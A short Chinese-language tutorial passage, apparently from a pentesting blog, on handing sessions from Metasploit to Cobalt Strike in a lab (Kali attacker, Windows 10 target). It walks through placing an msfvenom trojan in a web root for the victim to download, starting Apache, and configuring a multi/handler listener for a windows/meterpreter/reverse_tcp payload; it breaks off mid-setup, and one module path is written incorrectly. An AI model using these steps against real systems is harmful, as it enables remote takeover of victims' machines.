内网渗透中metasploit与cs之间的会话转交
`注:若有侵权请联系删除
目录
前言
在内网渗透中,metasploit与cs往往是联合使用的,其意义与重要性不言而喻,涉及到很多后期操作例如联合提权,那么其二者之间会话的转交就是这一切后期操作的根本了
这里监听机为kali2021.4版,靶机为win10
一、metasploit–>cs
1. 利用msfvenom创建一个木马文件ikun.exe在目录/var/www/html/下(方便靶机下载运行木马)
2. 开启Apache2
service apache2 start
3. 开启msfconsole并使用 exploit/multi/handler模块
use exploit/multi/handler/reverse_tcp
4. 查看配置并进行配置
4.1查看配置
show options
4.2配置监听端口(原来木马的生成端口)和本地监听地址(本机内网IP地址)及payload(木马生成payload)
set lport 8888
set lhost 192.168.43.75
set payload windows/meterpreter/reverse_tcp